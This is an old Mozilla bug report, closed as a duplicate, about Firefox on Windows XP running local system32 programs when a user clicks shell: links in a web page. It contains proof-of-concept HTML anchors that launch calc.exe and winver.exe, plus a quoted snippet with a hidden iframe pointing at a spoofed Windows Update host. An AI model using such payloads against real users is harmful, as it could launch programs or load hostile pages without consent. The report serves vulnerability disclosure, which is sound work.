Closed Bug 250356 Opened 17 years ago Closed 17 years ago
Mozilla / Firefox will execute local programs in the system32 dir using the shell: code in html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626 Firefox/0.9.1 Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040626 Firefox/0.9.1 -----snip------ center><br><br><img src="nocigar.gif"></center> <center> <a href="shell:windows\snakeoil.txt">who goes there</a></center> <iframe src="http://windowsupdate.microsoft.com%2F.http- equiv.dyndns.org/~http-equiv/b*llsh*t.html" style="display:none"> [customise as you see fit] <http://www.malware.com/stockpump.html> ------end---------- The code above has interest to me. Even in Mozilla the commands below will work. <a href=shell:windows\\system32\\calc.exe>1</a> <a href=shell:windows\system32\calc.exe>2</a> <a href=shell:windows\system32\winver.exe>4</a> Just save them to an .html file and run it. The first one with the double quotes was from bugtraq: Bugtraq: Internet Explorer Causing Explorer.exe - Null Pointer Crash <http://seclists.org/lists/bugtraq/2004/Mar/0188.html> The links below that will run calc as well as winver. It seems it calls windows as a virtual dir because c:\winxp is what I have. I have been playing around to see if cmd.exe will work with it but without luck. This is what is in the registry. HKEY_CLASSES_ROOT\Shell Look in the registry key above. You will find the shell object calls Windows Explorer with a particular set of arguments. %SystemRoot%\Explorer.exe /e,/idlist,%I,%L Basically, I have been able to call several programs from the /system32 in mozilla using the shell: call. This could easily be exploited with a BO if passed to the correct local program. Reproducible: Always Steps to Reproduce: 1.<a href=shell:windows\system32\calc.exe>2</a> 2.<a href=shell:windows\system32\winver.exe>4</a> 3. Actual Results: After clicking on the links above in XP / Firefox 1.9 the specified applications are launched. Expected Results: Mozilla should possibly blasklist the shell: protocol????
Already public and fixed. *** This bug has been marked as a duplicate of 250180 ***
Status: UNCONFIRMED → RESOLVED
Closed: 17 years ago
Resolution: --- → DUPLICATE
thank you for your report, in the future if you could report it to us a day before you mention it to full-disclosure instead of the other way around, that'd be nice. :)
Status: RESOLVED → VERIFIED
You need to log in before you can comment on or make changes to this bug.